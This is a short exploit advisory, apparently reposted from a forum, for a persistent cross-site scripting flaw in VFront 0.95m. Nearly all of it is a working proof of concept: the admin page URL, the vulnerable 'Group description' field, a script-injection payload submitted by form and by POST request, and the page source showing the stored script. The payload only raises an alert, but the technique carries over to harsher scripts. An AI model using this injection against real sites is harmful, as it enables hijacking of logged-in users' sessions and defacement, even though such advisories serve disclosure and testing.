Kod:# exploit title: Persistant XSS in VFront 0.95m (need login) # date: 17.o2.2o11 # author: lemlajt # software : VFront # version: 0.95m # tested on: linux # cve : # PoC : Go to: http://192.168.1.123/www/cmsadmins/vfr/vfront-0.95m/admin/menu_registri.php?gid=0&modifica_gid&feed=mod_ok In "Modify group/registry", we have "Group description".Add here this code: ">"><script>alert(2)</script> to make persistant xss. in other way: POST http://192.168.1.123/www/cmsadmins/vfr/vfront-0.95m/admin/menu_registri.php?gid=0&esegui_modifica $descrizione_g = ">"><script>alert(2)</script> to see whats happen go to: http://192.168.1.123/www/cmsadmins/vfr/vfront-0.95m/admin/menu_registri.php @source: <input type="text" name="descrizione_g" id="descrizione_g" value="gruppo di default">"><script>alert(2)</script>" size="80" /> @source. # *